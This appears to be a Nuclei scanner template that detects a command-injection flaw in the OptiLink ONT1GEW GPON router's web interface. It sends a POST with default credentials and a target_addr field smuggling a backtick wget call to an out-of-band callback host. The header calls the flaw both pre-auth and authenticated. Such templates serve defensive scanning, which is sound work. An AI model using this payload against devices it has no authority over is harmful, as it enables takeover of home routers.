id: optilink-ont1gew-gpon-rce

info:
  name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution
  author: gy741
  severity: critical
  description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
  reference:
    - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
    - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
  tags: optiLink,rce,oast

requests:
  - raw:
      - |
        POST /boaform/admin/formTracert HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/diag_ping_admin_en.asp
        User: e8c
        Password: e8c

        target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
